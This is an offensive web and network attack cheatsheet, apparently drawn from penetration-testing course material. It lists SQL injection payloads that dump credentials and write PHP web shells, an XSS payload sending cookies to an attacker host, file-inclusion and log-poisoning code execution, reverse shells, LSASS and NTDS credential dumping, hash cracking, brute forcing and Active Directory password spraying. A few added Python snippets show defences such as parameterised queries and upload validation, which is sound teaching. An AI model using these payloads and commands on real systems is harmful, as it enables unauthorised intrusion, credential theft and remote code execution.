INSERT INTO table_name(column2, ...) VALUES (column2_value, ..) Add values to specific columns in a table
UPDATE table_name SET column1=newvalue1, ... WHERE <condition> Update table values
Columns
SELECT * FROM table_name Show all columns in a table
SELECT column1, column2 FROM table_name Show specific columns in a table
DROP TABLE logins Delete a table
ALTER TABLE logins ADD newColumn INT Add new column
ALTER TABLE logins RENAME COLUMN newColumn TO oldColumn Rename column
ALTER TABLE logins MODIFY oldColumn DATE Change column datatype
ALTER TABLE logins DROP oldColumn Delete column
Output
SELECT * FROM logins ORDER BY column_1 Sort by column
SELECT * FROM logins ORDER BY column_1 DESC Sort by column in descending order
SELECT * FROM logins ORDER BY column_1 DESC, id ASC Sort by two-columns
SELECT * FROM logins LIMIT 2 Only show first two results
SELECT * FROM logins LIMIT 1, 2 Only show first two results starting from index 2
SELECT * FROM table_name WHERE <condition> List results that meet a condition
SELECT * FROM logins WHERE username LIKE 'admin%' List results where the name is similar to a given string

MySQL Operator Precedence (highest first):

- Division (/), Multiplication (*), and Modulus (%)
- Addition (+) and Subtraction (-)
- Comparison (=, >, <, <=, >=, !=, LIKE)
- NOT (!)
- AND (&&)
- OR (||)

SQL Injection

Payload Description
Auth Bypass
admin' or '1'='1 Basic Auth Bypass
admin')-- - Basic Auth Bypass With comments
Auth Bypass Payloads
Union Injection
' order by 1-- - Detect number of columns using order by
cn' UNION select 1,2,3-- - Detect number of columns using Union injection
cn' UNION select 1,@@version,3,4-- - Basic Union injection
UNION select username, 2, 3, 4 from passwords-- - Union injection for 4 columns
DB Enumeration
SELECT @@version Fingerprint MySQL with query output
SELECT SLEEP(5) Fingerprint MySQL with no output
cn' UNION select 1,database(),2,3-- - Current database name
cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- - List all databases
cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- - List all tables in a specific database
cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- - List all columns in a specific table
cn' UNION select 1, username, password, 4 from dev.credentials-- - Dump data from a table in another database
Privileges
cn' UNION SELECT 1, user(), 3, 4-- - Find current user
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- - Find if user has admin privileges
cn' UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- - Find if all user privileges
cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- - Find which directories can be accessed through MySQL
File Injection
cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- - Read local file
select 'file written successfully!' into outfile '/var/www/html/proof.txt' Write a string to a local file
cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- - Write a web shell into the base web directory
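To show why the Auth Bypass payload in the table works and why the operator precedence listed above matters, here is an added example (not from the original cheatsheet) that runs the payload against a string-built query and against a parameterised one; the table and accounts are constructed in an in-memory SQLite database, which shares MySQL's AND-before-OR precedence.

```python
"""Added example, not part of the original cheatsheet: the Auth Bypass payload
above (admin' or '1'='1) run against a string-built query and against a
parameterised one, on an in-memory SQLite table constructed here. SQLite shares
MySQL's AND-before-OR precedence, which is what makes the bypass work."""
import sqlite3


def setup_db():
    """Constructed sample table with two accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE logins (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO logins VALUES (?, ?, ?)",
                     [(1, "admin", "S3cret!"), (2, "bob", "hunter2")])
    return conn


def build_vulnerable_query(username, password):
    """String concatenation: user input becomes part of the SQL grammar."""
    return f"SELECT username FROM logins WHERE username='{username}' AND password='{password}'"


def login_vulnerable(conn, username, password):
    row = conn.execute(build_vulnerable_query(username, password)).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Placeholders: the driver passes the values separately, so quotes in them
    are data, never syntax. The same payload now simply matches no user."""
    row = conn.execute(
        "SELECT username FROM logins WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


PAYLOAD = "admin' or '1'='1"

if __name__ == "__main__":
    db = setup_db()
    # Precedence: AND binds tighter than OR, so the WHERE clause is parsed as
    # username='admin' OR ('1'='1' AND password='wrong') and the admin row matches.
    print(build_vulnerable_query(PAYLOAD, "wrong"))
    print("vulnerable:", login_vulnerable(db, PAYLOAD, "wrong"))  # admin
    print("safe:      ", login_safe(db, PAYLOAD, "wrong"))        # None
```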

SQLMAP

Command Description
sqlmap -h View the basic help menu
sqlmap -hh View the advanced help menu
sqlmap -u "http://www.example.com/vuln.php?id=1" --batch Run SQLMap without asking for user input
sqlmap 'http://www.example.com/' --data 'uid=1&name=test' SQLMap with POST request
sqlmap 'http://www.example.com/' --data 'uid=1*&name=test' POST request specifying an injection point with an asterisk
sqlmap -r req.txt Passing an HTTP request file to SQLMap
sqlmap ... --cookie='PHPSESSID=ab4530f4a7d10448457fa8b0eadac29c' Specifying a cookie header
sqlmap -u www.target.com --data='id=1' --method PUT Specifying a PUT request
sqlmap -u "http://www.target.com/vuln.php?id=1" --batch -t /tmp/traffic.txt Store traffic to an output file
sqlmap -u "http://www.target.com/vuln.php?id=1" -v 6 --batch Specify verbosity level
sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -" Specifying a prefix or suffix
sqlmap -u www.example.com/?id=1 -v 3 --level=5 --risk=3 Specifying the level and risk
sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba Basic DB enumeration
sqlmap -u "http://www.example.com/?id=1" --tables -D testdb Table enumeration
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname Table/row enumeration
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --where="name LIKE 'f%'" Conditional enumeration
sqlmap -u "http://www.example.com/?id=1" --schema Database schema enumeration
sqlmap -u "http://www.example.com/?id=1" --search -T user Searching for data
sqlmap -u "http://www.example.com/?id=1" --passwords --batch Password enumeration and cracking
sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token" Anti-CSRF token bypass
sqlmap --list-tampers List all tamper scripts
sqlmap -u "http://www.example.com/case1.php?id=1" --is-dba Check for DBA privileges
sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd" Reading a local file
sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php" Writing a file
sqlmap -u "http://www.example.com/?id=1" --os-shell Spawning an OS shell

XSS

Code Description
XSS Payloads
<script>alert(window.origin)</script> Basic XSS Payload
<plaintext> Basic XSS Payload
<script>print()</script> Basic XSS Payload
<img src="" onerror=alert(window.origin)> HTML-based XSS Payload
<script>document.body.style.background = "#141d2b"</script> Change Background Color
<script>document.body.background = "https://www.hackthebox.eu/images/logo-htb.svg"</script> Change Background Image
<script>document.title = 'HackTheBox Academy'</script> Change Website Title
<script>document.getElementsByTagName('body')[0].innerHTML = 'text'</script> Overwrite website's main body
<script>document.getElementById('urlform').remove();</script> Remove certain HTML element
<script src="http://OUR_IP/script.js"></script> Load remote script
<script>new Image().src='http://OUR_IP/index.php?c='+document.cookie</script> Send Cookie details to us
Commands
python xsstrike.py -u "http://SERVER_IP:PORT/index.php?task=test" Run xsstrike on a url parameter
sudo nc -lvnp 80 Start netcat listener
sudo php -S 0.0.0.0:80 Start PHP server

Path traversal

Local File Inclusion

Command Description
Basic LFI
/index.php?language=/etc/passwd Basic LFI
/index.php?language=../../../../etc/passwd LFI with path traversal
/index.php?language=/../../../etc/passwd LFI with name prefix
/index.php?language=./languages/../../../../etc/passwd LFI with approved path
LFI Bypasses
/index.php?language=....//....//....//....//etc/passwd Bypass basic path traversal filter
/index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 Bypass filters with URL encoding
/index.php?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times] Bypass appended extension with path truncation (obsolete)
/index.php?language=../../../../etc/passwd%00 Bypass appended extension with null byte (obsolete)
/index.php?language=php://filter/read=convert.base64-encode/resource=config Read PHP with base64 filter
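Added example, not part of the original cheatsheet: a pure-string model of the filter the `....//` and URL-encoded payloads above defeat, beside a resolver that rejects them. The include pattern (`./languages/` plus the user value under /var/www/html), the hardened functions and the language allowlist are assumptions made for the illustration; paths are computed with posixpath so nothing touches the file system.

```python
import posixpath
import urllib.parse

# Assumed layout of the vulnerable app: include("./languages/" . $_GET['language'])
WEB_ROOT = "/var/www/html"
LANG_DIR = posixpath.join(WEB_ROOT, "languages")
ALLOWED_LANGS = {"en", "es", "de"}  # constructed allowlist


def resolve_naive(raw_value: str) -> str:
    """The broken defence: strip '../' from the raw query value once, then let
    the framework URL-decode it and build the include path. Returns the path
    include() would open."""
    filtered = raw_value.replace("../", "")
    decoded = urllib.parse.unquote(filtered)
    return posixpath.normpath(posixpath.join(LANG_DIR, decoded))


def resolve_hardened(raw_value: str):
    """Decode first, reject control characters, canonicalise, then require the
    result to stay inside LANG_DIR. Returns None when the request is rejected.
    On a real system canonicalise with os.path.realpath so symlinks count too."""
    decoded = urllib.parse.unquote(raw_value)
    if "\x00" in decoded or "\\" in decoded:
        return None
    candidate = posixpath.normpath(posixpath.join(LANG_DIR, decoded))
    if posixpath.commonpath([LANG_DIR, candidate]) != LANG_DIR:
        return None
    return candidate


def resolve_allowlisted(value: str):
    """Strongest option for this pattern: never build a path from user input,
    map a key from a fixed set to a server-chosen file name."""
    if value not in ALLOWED_LANGS:
        return None
    return posixpath.join(LANG_DIR, value + ".php")


if __name__ == "__main__":
    for payload in ("../../../../etc/passwd",
                    "....//....//....//....//etc/passwd",
                    "%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"):
        print(f"{payload:55} naive -> {resolve_naive(payload)}  hardened -> {resolve_hardened(payload)}")
```

The naive filter stops the plain traversal but the `....//` payload collapses to `../` after one pass, and the percent-encoded form never matches the literal `../` at all; decoding before checking and comparing canonical paths closes both.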

Remote Code Execution

Command Description
PHP Wrappers
/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id RCE with data wrapper
curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id" RCE with input wrapper (requires allow_url_include=On)
curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id" RCE with expect wrapper (requires the PECL expect extension to be installed)
RFI
echo '<?php system($_GET["cmd"]); ?>' > shell.php && python3 -m http.server <LISTENING_PORT> Host web shell
/index.php?language=http://<OUR_IP>:<LISTENING_PORT>/shell.php&cmd=id Include remote PHP web shell (requires allow_url_include=On)
LFI + Upload
echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif Create malicious image (GIF8 satisfies a magic-byte check)
/index.php?language=./profile_images/shell.gif&cmd=id RCE with malicious uploaded image
echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php Create malicious zip archive 'as jpg'
/index.php?language=zip://shell.jpg%23shell.php&cmd=id RCE with malicious uploaded zip (%23 is the URL-encoded # that separates the archive from the file inside it)
php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg Create malicious phar 'as jpg'
/index.php?language=phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id RCE with malicious uploaded phar
Log Poisoning
/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd Read PHP session parameters
/index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E Poison PHP session with web shell
/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=id RCE through poisoned PHP session
curl -s "http://<SERVER_IP>:<PORT>/index.php" -A '<?php system($_GET["cmd"]); ?>' Poison the Apache access log through the User-Agent header
/index.php?language=/var/log/apache2/access.log&cmd=id RCE through the poisoned access log

Misc

Command Description
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287 Fuzz page parameters
ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=FUZZ' -fs 2287 Fuzz LFI payloads
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/default-web-root-directory-linux.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ/index.php' -fs 2287 Fuzz webroot path
ffuf -w ./LFI-WordList-Linux:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ' -fs 2287 Fuzz server configurations
LFI Wordlists
LFI-Jhaddix.txt

File Inclusion Functions

Function Read Content Execute Remote URL
PHP
include()/include_once()
require()/require_once()
file_get_contents()
fopen()/file()
NodeJS
fs.readFile()
fs.sendFile()
res.render()
Java
include
import
.NET
@Html.Partial()
@Html.RemotePartial()
Response.WriteFile()
include

File Upload

Web Shells

Web Shell Description
<?php echo file_get_contents('/etc/passwd'); ?> Basic PHP File Read
<?php system('hostname'); ?> Basic PHP Command Execution
<?php system($_REQUEST['cmd']); ?> Basic PHP Web Shell
<% eval request('cmd') %> Basic ASP Web Shell
msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php Generate PHP reverse shell
PHP Web Shell Link to a ready-made PHP web shell
PHP Reverse Shell Link to a ready-made PHP reverse shell
Web/Reverse Shells List of Web Shells and Reverse Shells

Bypasses

Command Description
Client-Side Bypass
[CTRL+SHIFT+C] Toggle Page Inspector
Blacklist Bypass
shell.phtml Uncommon Extension
shell.pHp Case Manipulation
PHP Extensions List of PHP Extensions
ASP Extensions List of ASP Extensions
Web Extensions List of Web Extensions
Whitelist Bypass
shell.jpg.php Double Extension
shell.php.jpg Reverse Double Extension
%20, %0a, %00, %0d0a, /, .\, ., … Character Injection - Before/After Extension
Content-Type Bypass
Web Content-Types List of Web Content-Types
Content-Types List of All Content-Types
File Signatures List of File Signatures/Magic Bytes
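Added example, not from the original cheatsheet: the blacklist, regex whitelist and Content-Type checks listed above written as Python functions next to a validator that survives those bypasses. The weak controls and the magic-byte table are constructed for the illustration. The last case is the one to remember: a file that starts with `GIF8` followed by PHP passes a signature check, so the upload directory must also not execute scripts, or the image has to be re-encoded server-side.

```python
import os
import re
import secrets

# Constructed weak controls, modelled on the bypass rows above.
BLACKLIST = {".php", ".php5", ".phar"}            # forgets .phtml, case-sensitive
WEAK_WHITELIST = re.compile(r"^.+\.(jpg|jpeg|png|gif)", re.IGNORECASE)  # no '$' anchor
MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}


def weak_blacklist_ok(filename: str) -> bool:
    """Bypassed by an uncommon extension (.phtml) or case changes (.pHp)."""
    _, ext = os.path.splitext(filename)
    return ext not in BLACKLIST


def weak_whitelist_ok(filename: str) -> bool:
    """Bypassed by a double extension: 'shell.jpg.php' matches the prefix."""
    return WEAK_WHITELIST.match(filename) is not None


def weak_content_type_ok(content_type: str) -> bool:
    """The Content-Type header is chosen by the client, so this proves nothing."""
    return content_type in {"image/jpeg", "image/png", "image/gif"}


def strong_upload_check(filename: str, content: bytes) -> bool:
    """Allowlist the final extension, forbid extra dots and odd characters in
    the name, and require the file signature to match that extension."""
    base = os.path.basename(filename)
    m = re.fullmatch(r"[A-Za-z0-9_-]{1,64}\.(jpg|jpeg|png|gif)", base, re.IGNORECASE)
    if m is None:
        return False
    ext = m.group(1).lower()
    return content.startswith(MAGIC[ext])


def storage_name(filename: str) -> str:
    """Discard the client's name: random file name, server-chosen extension."""
    ext = os.path.splitext(filename)[1].lower()
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    polyglot = b"GIF8<?php system($_GET['cmd']); ?>"
    print("weak blacklist lets shell.phtml through:", weak_blacklist_ok("shell.phtml"))
    print("weak whitelist lets shell.jpg.php through:", weak_whitelist_ok("shell.jpg.php"))
    print("strong check on shell.jpg.php:", strong_upload_check("shell.jpg.php", b"\xff\xd8\xff"))
    print("strong check on GIF8 polyglot:", strong_upload_check("shell.gif", polyglot))
```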

Limited Uploads

Potential Attack File Types
XSS HTML, JS, SVG, GIF
XXE/SSRF XML, SVG, PDF, PPT, DOC
DoS ZIP, JPG, PNG

Password Attacks Cheatsheet

Password attacks are a pervasive threat in the digital landscape, often serving as the primary vector for cybercriminals to breach secure systems. In recent years, compromised credentials have been responsible for a significant majority of data breaches, with 81% of such incidents in 2020 attributed to weak or stolen passwords[1][2]. These attacks exploit vulnerabilities in user authentication, leveraging techniques such as phishing, man-in-the-middle attacks, brute force attempts, and credential stuffing to gain unauthorized access to sensitive information[1][2]. As technology advances, so too do the methods employed by hackers, making it increasingly important for individuals and organizations to implement robust security measures, including strong password policies and multi-factor authentication, to protect against these ever-evolving threats[5].

Connecting to Target

Command Description
xfreerdp /v:<IP> /u:htb-student /p:HTB_@cademy_stdnt! CLI-based tool used to connect to a Windows target using the Remote Desktop Protocol.
evil-winrm -i <IP> -u user -p password Uses Evil-WinRM to establish a PowerShell session with a target.
ssh user@<IP> Uses SSH to connect to a target using a specified user.
smbclient -U user \\\\<IP>\\SHARENAME Uses smbclient to connect to an SMB share using a specified user.
python3 smbserver.py -smb2support CompData /home/<user>/Documents/ Uses smbserver.py to create a share on a Linux-based attack host. Can be useful when needing to transfer files from a target to an attack host.

Password Mutations

Command Description
cewl https://www.inlanefreight.com -d 4 -m 6 --lowercase -w inlane.wordlist Uses cewl to generate a wordlist based on keywords present on a website (crawl depth 4, minimum word length 6, lowercased).
hashcat --force password.list -r custom.rule --stdout > mut_password.list Uses Hashcat to generate a rule-based word list.
./username-anarchy -i /path/to/listoffirstandlastnames.txt Uses the username-anarchy tool in conjunction with a pre-made list of first and last names to generate a list of potential usernames.
curl -s https://fileinfo.com/filetypes/compressed | html2text Fetches a web page and renders it as plain text, e.g. to harvest a list of file extensions for a wordlist.

Remote Password Attacks

Command Description
crackmapexec winrm <IP> -u user.list -p password.list Uses CrackMapExec over WinRM to attempt to brute force user names and passwords on a target.
crackmapexec smb <IP> -u "user" -p "password" --shares Uses CrackMapExec to enumerate SMB shares on a target using a specified set of credentials.
hydra -L user.list -P password.list <service>://<IP> Uses Hydra in conjunction with a user list and password list to attempt to crack a password over the specified service.
hydra -l username -P password.list <service>://<IP> Uses Hydra in conjunction with a username and password list to attempt to crack a password over the specified service.
hydra -L user.list -p password <service>://<IP> Uses Hydra in conjunction with a user list and a single password to attempt to crack a password over the specified service (password spraying).
hydra -C <user:pass list> ssh://<IP> Uses Hydra in conjunction with a list of colon-separated credentials to attempt to log in to a target over the specified service. This can be used to attempt a credential stuffing attack.
crackmapexec smb <IP> --local-auth -u <user> -p <password> --sam Uses CrackMapExec in conjunction with local admin credentials to dump the password hashes stored in the SAM over the network.
crackmapexec smb <IP> --local-auth -u <user> -p <password> --lsa Uses CrackMapExec in conjunction with local admin credentials to dump LSA secrets over the network. It is possible to get clear-text credentials this way.
crackmapexec smb <IP> -u <user> -p <password> --ntds Uses CrackMapExec in conjunction with domain admin credentials to dump hashes from the NTDS.dit file of a domain controller over the network.
evil-winrm -i <IP> -u Administrator -H "<NT hash>" Uses Evil-WinRM to establish a PowerShell session with a Windows target using a user name and NT hash. This is one type of Pass-the-Hash attack.

Windows Local Password Attacks

Command Description
tasklist /svc A command-line-based utility in Windows used to list running processes.
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml Uses the Windows command-line utility findstr to search recursively for the string "password" in many different file types.
Get-Process lsass A Powershell cmdlet is used to display process information. Using this with the LSASS process can be helpful when attempting to dump LSASS process memory from the command line.
rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full Uses rundll32 in Windows to create an LSASS memory dump file (672 is the LSASS PID obtained with Get-Process lsass; run from an elevated prompt). This file can then be transferred to an attack box to extract credentials.
pypykatz lsa minidump /path/to/lsassdumpfile Uses Pypykatz to parse and attempt to extract credentials & password hashes from an LSASS process memory dump file.
reg.exe save hklm\sam C:\sam.save Uses reg.exe in Windows to save a copy of a registry hive at a specified location on the file system. It can be used to make copies of any registry hive (i.e., hklm\sam, hklm\security, hklm\system).
move sam.save \\<IP>\NameofFileShare Uses move in Windows to transfer a file to a specified file share over the network.
python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL Uses Secretsdump.py to dump password hashes from the SAM database.
vssadmin CREATE SHADOW /For=C: Uses Windows command line based tool vssadmin to create a volume shadow copy for C:. This can be used to make a copy of NTDS.dit safely.
cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit Uses the Windows command line tool copy to copy NTDS.dit out of the volume shadow copy of C: (the SYSTEM hive is needed as well to decrypt it).

Linux Local Password Attacks

Command Description
for l in $(echo ".conf .config .cnf");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "lib";done Bash loop that searches the whole file system for configuration files by extension, filtering out library paths.
for i in $(find / -name *.cnf 2>/dev/null | grep -v "doc");do echo -e "\nFile: " $i; grep -i "user\|password\|pass" $i 2>/dev/null | grep -v "^#";done Bash loop that greps every .cnf file found for credential-related keywords, skipping commented lines.
for l in $(echo ".sql .db .*db .db*");do echo -e "\nDB File extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc";done Bash loop that searches the file system for database files by extension.
find /home/* -type f -name "*.txt" -o ! -name "*.*" Uses the Lin​ux find command to search all home directories for text files and for files without an extension.
for l in $(echo ".py .pyc .pl .go .jar .c .sh");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc";done Bash loop that searches the file system for scripts and source files by extension.
for ext in $(echo ".xls .xls* .xltx .csv .od* .doc .doc* .pdf .pot .pot* .pp*");do echo -e "\nFile extension: " $ext; find / -name *$ext 2>/dev/null | grep -v "lib";done Bash loop that searches the file system for office documents and spreadsheets by extension.
cat /etc/crontab Uses the Linux cat command to view the contents of crontab in search of credentials.
ls -la /etc/cron.*/ Uses ls -la to list all cron.* directories under /etc and the scripts they contain.
grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1" Recursively searches the whole file system for files containing "PRIVATE KEY" and keeps only matches on line 1, i.e. files that start with a key header.
grep -rnw "PRIVATE KEY" /home/* 2>/dev/null | grep ":1" Same search limited to home directories.
grep -rnw "ssh-rsa" /home/* 2>/dev/null | grep ":1" Searches home directories for SSH public keys and authorized_keys entries.
tail -n5 /home/*/.bash* Uses the Linux tail command to output the last 5 lines of every user's bash history and bash configuration files.
python3 mimipenguin.py Runs Mimipenguin.py using python3.
bash mimipenguin.sh Runs Mimipenguin.sh using bash.
python2.7 lazagne.py all Runs Lazagne.py with all modules using python2.7.
ls -l .mozilla/firefox/ | grep default Lists the Firefox profile directories of the current user.
cat .mozilla/firefox/1bplpd86.default-release/logins.json | jq . Pretty-prints the (still encrypted) saved logins of a Firefox profile.
python3.9 firefox_decrypt.py Runs Firefox_decrypt.py to decrypt any encrypted credentials stored by Firefox. Program will run using python3.9.
python3 lazagne.py browsers Runs Lazagne.py browsers module using Python 3.

Cracking Passwords

Command Description
hashcat -m 1000 dumpedhashes.txt /usr/share/wordlists/rockyou.txt Uses Hashcat to crack NTLM hashes using a specified wordlist.
hashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /usr/share/wordlists/rockyou.txt --show Uses Hashcat to attempt to crack a single NTLM hash and display the results in the terminal output.
unshadow /tmp/passwd.bak /tmp/shadow.bak > /tmp/unshadowed.hashes Uses unshadow to combine data from passwd.bak and shadow.bak into one single file to prepare for cracking.
hashcat -m 1800 -a 0 /tmp/unshadowed.hashes rockyou.txt -o /tmp/unshadowed.cracked Uses Hashcat in conjunction with a wordlist to crack the unshadowed hashes and outputs the cracked hashes to a file called unshadowed.cracked.
hashcat -m 500 -a 0 md5-hashes.list rockyou.txt Uses Hashcat in conjunction with a word list to crack the md5 hashes in the md5-hashes.list file.
hashcat -m 22100 backup.hash /opt/useful/seclists/Passwords/Leaked-Databases/rockyou.txt -o backup.cracked Uses Hashcat to crack the extracted BitLocker hashes using a wordlist and outputs the cracked hashes into a file called backup.cracked.
ssh2john.pl SSH.private > ssh.hash Runs Ssh2john.pl script to generate hashes for the SSH keys in the SSH.private file, then redirects the hashes to a file called ssh.hash.
john ssh.hash --show Uses John to attempt to crack the hashes in the ssh.hash file, then outputs the results in the terminal.
office2john.py Protected.docx > protected-docx.hash Runs Office2john.py against a protected .docx file and converts it to a hash stored in a file called protected-docx.hash.
john --wordlist=rockyou.txt protected-docx.hash Uses John in conjunction with the wordlist rockyou.txt to crack the hash protected-docx.hash.
pdf2john.pl PDF.pdf > pdf.hash Runs the pdf2john.pl script to convert a PDF file into a hash that can be cracked.
john --wordlist=rockyou.txt pdf.hash Runs John in conjunction with a wordlist to crack a pdf hash.
zip2john ZIP.zip > zip.hash Runs Zip2john against a zip file to generate a hash, then adds that hash to a file called zip.hash.
john --wordlist=rockyou.txt zip.hash Uses John in conjunction with a wordlist to crack the hashes contained in zip.hash.
bitlocker2john -i Backup.vhd > backup.hashes Uses Bitlocker2john script to extract hashes from a VHD file and directs the output to a file called backup.hashes.
file GZIP.gzip Uses the Linux-based file tool to gather file format information.
for i in $(cat rockyou.txt);do openssl enc -aes-256-cbc -d -in GZIP.gzip -k $i 2>/dev/null | tar xz;done Bash loop that tries every word in rockyou.txt as the passphrase of an AES-256-CBC encrypted tarball; only the correct passphrase produces output that tar can extract.

Hydra

Command Description
hydra -h hydra help
hydra -C wordlist.txt SERVER_IP -s PORT http-get / Basic Auth Brute Force - Combined Wordlist
hydra -L wordlist.txt -P wordlist.txt -u -f SERVER_IP -s PORT http-get / Basic Auth Brute Force - User/Pass Wordlists
hydra -l admin -P wordlist.txt -f SERVER_IP -s PORT http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'" Login Form Brute Force - Static User, Pass Wordlist
hydra -L bill.txt -P william.txt -u -f ssh://SERVER_IP:PORT -t 4 SSH Brute Force - User/Pass Wordlists
hydra -l m.gates -P rockyou-10.txt ftp://127.0.0.1 FTP Brute Force - Static User, Pass Wordlist

Wordlists

Command Description
/opt/useful/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt Default Passwords Wordlist
/opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt Common Passwords Wordlist
/opt/useful/SecLists/Usernames/Names/names.txt Common Names Wordlist

Misc

Command Description
cupp -i Creating Custom Password Wordlist
sed -ri '/^.{,7}$/d' william.txt Remove Passwords Shorter Than 8
sed -ri '/[!-/:-@[-`{-~]+/!d' william.txt Remove Passwords With No Special Chars
sed -ri '/[0-9]+/!d' william.txt Remove Passwords With No Numbers
./username-anarchy Bill Gates > bill.txt Generate Usernames List
ssh b.gates@SERVER_IP -p PORT SSH to Server
ftp 127.0.0.1 FTP to Server
su - user Switch to User

Active Directory Cheatsheet

Penetration testing and network exploitation involve a wide array of tools and techniques designed to assess and improve the security of computer systems. These tools help identify vulnerabilities, validate user credentials, and simulate attacks to test defenses. From enumerating network shares and users to exploiting weaknesses in authentication protocols like Kerberos, each tool serves a specific purpose in the broader strategy of ethical hacking. This collection of commands and tools provides a comprehensive overview of the methods used to enumerate systems, manage credentials, gain remote access, and escalate privileges, ultimately aiding in the detection and mitigation of security threats. Below are organized tables detailing these tools and their applications.

The process should go as follows:

1- Get users (user enumeration with kerbrute)

2- Get passwords or hashes (AS-REP roasting, password spraying, NTLM capture and relaying, cracking) to log in, pass the hash, overpass the hash (when NTLM authentication is not available, e.g. for GUI access a Kerberos ticket is needed) or perform DCSync

3- Get service account passwords, hashes or tickets (Kerberoasting of TGS-REPs, silver ticket) to pass the hash or pass the ticket

4- Get Domain Admin passwords or hashes (Mimikatz, golden ticket) to log in, or keep full persistence with a golden ticket or shadow copies of NTDS.dit

more commands on: WADComs

Enumeration Tools

Tool/Command Description
enum4linux $IP Enumerate SMB shares and users on the target IP.
crackmapexec smb --pass-pol $IP Check password policy on the target SMB server.
crackmapexec smb $IP --shares List available SMB shares on the target IP.
crackmapexec smb $IP -M spider_plus Run Spider Plus module on the target SMB server.
smbmap -u invalid -H $IP Attempt to connect to SMB shares with an invalid user.
ldapsearch -H ldap://$IP -x -b "dc=domain,dc=local" Perform LDAP enumeration on the target domain.

Username Validation and Password Spraying

Tool/Command Description
kerbrute_linux_amd64 userenum -d domain.local --dc $IP users.txt Enumerate valid usernames in the domain.
kerbrute_linux_amd64 passwordspray -d domain.local --dc $IP users.txt 'S3cret' Spray a common password across the enumerated usernames.
kerbrute_linux_amd64 bruteforce -d domain.local --dc $IP creds.txt Perform brute-force attacks using a list of credentials.
crackmapexec smb $IP -u users.txt -p 'S3cret' Attempt to login to SMB with a list of users and a single password.
crackmapexec smb $IP -u users.txt -p passwords.txt Attempt to login to SMB with a list of users and multiple passwords.

LLMNR/NBT-NS Poisoning Tools

Tool/Command Description
crackmapexec smb 10.10.10.10 -u username -p password -M scuffy -o NAME=filename SERVER=IP_RESPONDER Create a malicious SCF file to capture NTLM hashes via SMB.
crackmapexec smb 10.10.10.10 -u username -p password -M slinky -o NAME=filename SERVER=IP_RESPONDER Create a malicious LNK file to capture NTLM hashes via SMB.
